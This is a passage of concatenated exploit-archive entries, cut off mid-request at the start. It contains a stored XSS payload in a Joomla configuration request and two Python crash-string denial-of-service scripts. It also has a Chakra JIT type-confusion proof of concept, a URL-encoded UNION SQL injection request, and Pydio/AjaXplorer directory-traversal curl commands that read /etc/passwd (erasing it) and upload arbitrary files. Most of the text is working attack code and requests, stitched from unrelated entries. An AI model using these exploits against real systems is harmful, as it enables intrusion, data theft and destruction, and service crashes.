orm%5Bftp_enable%5D=0&jform%5Bftp_host%5D=&jform%5Bftp_port%5D=&jform%5Bftp_user%5D=&jform%5Bftp_pass%5D=&jform%5Bftp_root%5D=&jform%5Bproxy_enable%5D=0&jform%5Bproxy_host%5D=&jform%5Bproxy_port%5D=&jform%5Bproxy_user%5D=&jform%5Bproxy_pass%5D=&jform%5Bdbtype%5D=mysqli&jform%5Bhost%5D=localhost&jform%5Buser%5D=root&jform%5Bdb%5D=joomla&jform%5Bdbprefix%5D=isadh_&jform%5Bmailonline%5D=1&jform%5Bmassmailoff%5D=0&jform%5Bmailfrom%5D=test%40example.com&jform%5Bfromname%5D=testjoomla&jform%5Breplyto%5D=&jform%5Breplytoname%5D=&jform%5Bmailer%5D=mail&jform%5Bsendmail%5D=%2Fusr%2Fsbin%2Fsendmail&jform%5Bsmtphost%5D=localhost&jform%5Bsmtpport%5D=25&jform%5Bsmtpsecure%5D=none&jform%5Bsmtpauth%5D=0&jform%5Bsmtpuser%5D=&jform%5Bsmtppass%5D=&jform%5Bfilters%5D%5B1%5D%5Bfilter_type%5D=BL&jform%5Bfilters%5D%5B1%5D%5Bfilter_tags%5D=ss%22%3E%3Cimg+src%3D+xx+onerror%3Dalert%287575%29%3E%3C&jform%5Bfilters%5D%5B1%5D%5Bfilter_attributes%5D=&jform%5Bfilters%5D%5B9%5D%5Bfilter_type%5D=BL&jform%5Bfilters%5D%5B9%5D%5Bfilter_tags%5D=&jform%5Bfilters%5D%5B9%5D%5Bfilter_attributes%5D=&jform%5Bfilters%5D%5B6%5D%5Bfilter_type%5D=BL&jform%5Bfilters%5D%5B6%5D%5Bfilter_tags%5D=&jform%5Bfilters%5D%5B6%5D%5Bfilter_attributes%5D=&jform%5Bfilters%5D%5B7%5D%5Bfilter_type%5D=BL&jform%5Bfilters%5D%5B7%5D%5Bfilter_tags%5D=&jform%5Bfilters%5D%5B7%5D%5Bfilter_attributes%5D=&jform%5Bfilters%5D%5B2%5D%5Bfilter_type%5D=NH&jform%5Bfilters%5D%5B2%5D%5Bfilter_tags%5D=&jform%5Bfilters%5D%5B2%5D%5Bfilter_attributes%5D=&jform%5Bfilters%5D%5B3%5D%5Bfilter_type%5D=BL&jform%5Bfilters%5D%5B3%5D%5Bfilter_tags%5D=&jform%5Bfilters%5D%5B3%5D%5Bfilter_attributes%5D=&jform%5Bfilters%5D%5B4%5D%5Bfilter_type%5D=BL&jform%5Bfilters%5D%5B4%5D%5Bfilter_tags%5D=&jform%5Bfilters%5D%5B4%5D%5Bfilter_attributes%5D=&jform%5Bfilters%5D%5B5%5D%5Bfilter_type%5D=BL&jform%5Bfilters%5D%5B5%5D%5Bfilter_tags%5D=&jform%5Bfilters%5D%5B5%5D%5Bfilter_attributes%5D=&jform%5Bfilters%5D%5B8%5D%5Bfilter_type%5D=NONE&jform%5Bfilters%5D%5B8%5D%5Bfilter_tags%5D=&jform%5Bfilters%5D%5B8%5D%5Bfilter_attributes%5D=&task=config.save.application.apply&fc4982bad4604f5ea5d8adc003a6034c=1
4. Save the Changes.
5. Navigate to Global Configuration page and an alert box will pop up. Here's the response body:
==========
Response:
==========
HTTP/1.1 303 See other
Date: Fri, 18 Jan 2019 07:30:48 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.26
Location: /administrator/index.php?option=com_config
Expires: Wed, 17 Aug 2005 00:00:00 GMT
Last-Modified: Fri, 18 Jan 2019 07:30:48 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
===================================
#Vulnerability Disclosure Timeline:
===================================
11/2018: First email to disclose the vulnerability to Joomla.
12/2018: Vendor confirmed vulnerability.
01/2019: Vendor published advisory and released a fix.
# Exploit Title: FastTube 1.0.1.0 - Denial of Service (PoC)
# Date: 1/18/2018
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://www.microsoft.com/store/productId/9MXS9JVDP25V
# Version: 1.0.1.0
# Tested on: Windows 10
# Proof of Concept:
# Run the python script, it will create a new file "PoC.txt"
# Copy the text from the generated PoC.txt file to clipboard
# Paste the text in the search bar and click search
# App will now crash
buffer = "A" * 1900
payload = buffer
try:
f=open("PoC.txt","w")
print "[+] Creating %s evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
/*
In Chakra, if you add a numeric property to an object having inlined properties, it will start transition to a new type where the space for some of previously inlined properties become for the pointer to the property slots and the pointer to the object array which stores numeric properties. For this reason, when it optimizes an InlineArrayPush instruction which might start transition, it needs to kill corresponding type symbols to prevent type confusion. But it doesn't, so it can lead to type confusion.
PoC:
*/
function opt(a, b) {
a.b = 2;
b.push(0);
a.a = 0x1234;
}
function main() {
Object.prototype.push = Array.prototype.push;
for (let i = 0; i < 1000; i++) {
let a = {a: 1, b: 2};
opt(a, {});
}
let o = {a: 1, b: 2};
opt(o, o);
print(o.a);
}
main();
# Exploit Title: VPN Browser+ 1.1.0.0 - Denial of Service (PoC)
# Date: 1/18/2018
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://www.microsoft.com/store/productId/9NFFFFS5Z2C7
# Version: 1.1.0.0
# Tested on: Windows 10
# Proof of Concept:
# Run the python script, it will create a new file "PoC.txt"
# Copy the text from the generated PoC.txt file to clipboard
# Paste the text in the search bar and click search
# App will now crash
buffer = "A" * 5800
payload = buffer
try:
f=open("PoC.txt","w")
print "[+] Creating %s evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
# Exploit Title: Kepler Wallpaper Script 1.1 - SQL Injection
# Dork: N/A
# Date: 2019-01-19
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://keplerwallpapers.online/
# Software Link: https://codeclerks.com/PHP/1559/Kepler-Wallpaper-Script
# Version: 1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]//[PATH]/category/xxx[SQL]
#
GET /[PATH]/category/xxx%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2d%2d%20%2d HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=6963a7f072dbf72fb4cb420c9f5ad80a; ResolutionWidthAuto=1366; ResolutionHeightAuto=768; FilterType=Auto
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Sat, 19 Jan 2019 09:01:06 GMT
Server: Apache
X-Powered-By: PHP/5.6.37
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Strict-Transport-Security: max-age=31536000
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
# Exploit Title: Unauthenticated Arbitrary File Upload Vulnerability In Pydio/AjaXplorer 5.0.3 – 3.3.5
# Date: 01/18/2019
# Exploit Author: @_jazz______
# Vendor Homepage: https://pydio.com/
# Software Link: https://sourceforge.net/projects/ajaxplorer/files/ajaxplorer/stable-channel/4.2.3/ajaxplorer-core-4.2.3.tar.gz/download
# Version: ajaXplorer before 5.0.4
# Tested on: ajaXplorer 4.2.3 on Debian 9 update 5
# References: https://web.archive.org/web/20140430075145/http://www.redfsec.com/CVE-2013-6227
# CVE: CVE-2013-6227
###########################################################################################
Affected file:
/plugins/editor.zoho/agent/save_zoho.php
<?php
$vars = array_merge($_GET, $_POST);
if(!isSet($vars["ajxp_action"]) && isset($vars["id"]) && isset($vars["format"])){
$filezoho = $_FILES['content']["tmp_name"];
$cleanId = str_replace(array("..", "/"), "", $vars["id"]);
move_uploaded_file($filezoho, "files/".$cleanId.".".$vars["format"]);
}else if($vars["ajxp_action"] == "get_file" && isSet($vars["name"])){
if(file_exists("files/".$vars["name"])){
readfile("files/".$vars["name"]);
unlink("files/".$vars["name"]);
}
}
?>
Option 1: If "ajxp_action" is not set, upload "content" file to files/id.format.
The code does not sanitize "format" parameter before passing it as an argument to "move_uploaded_file",
thus introducing an opportunity to upload files to any arbitrary location via directory traversal
Note: User should have permission to write on the desired location.
Option 2: If "ajxp_action" is set to "get_file", read the file from "files/name" and then ERASE IT (unlink).
Again, the code does not sanitize the "name" parameter, making it also vulnerable to directory traversal.
"files" directory's location is by default /plugins/editor.zoho/agent/files
A default location for reading/uploading files is /data/files/
###########################################################################################
[1] [CAUTION!] Read arbitrary files
curl "http://<url>/<ajaxplorer_wwwroot>/plugins/editor.zoho/agent/save_zoho.php?ajxp_action=get_file&name=<file_relative_path>"
e.g. curl "http://muralito.el.payaso/ajaxplorer/plugins/editor.zoho/agent/save_zoho.php?ajxp_action=get_file&name=../../../../../../../../etc/passwd"
[USE WITH CAUTION] This is a destructive function. Files retrieved WILL be erased after reading, provided that the file is writable by the user which the web server's process is running as.
[2] Arbitrary File Upload
*step 1 - Upload the file to the server*
# curl -F 'content=@<filename_from_attacker_host>;type=<filetype>;filename=\"<filename>\"' "http://<url>/<ajaxplorer_wwwroot>/plugins/editor.zoho/agent/save_zoho.php?id=&format=<upload_to_file_relative_path>"
e.g. # curl -F 'content=@test.html;type=text/html;filename=\"test.html\"' "http://muralito.el.payaso/ajaxplorer/plugins/editor.zoho/agent/save_zoho.php?id=&format=./../../../data/files/test.html"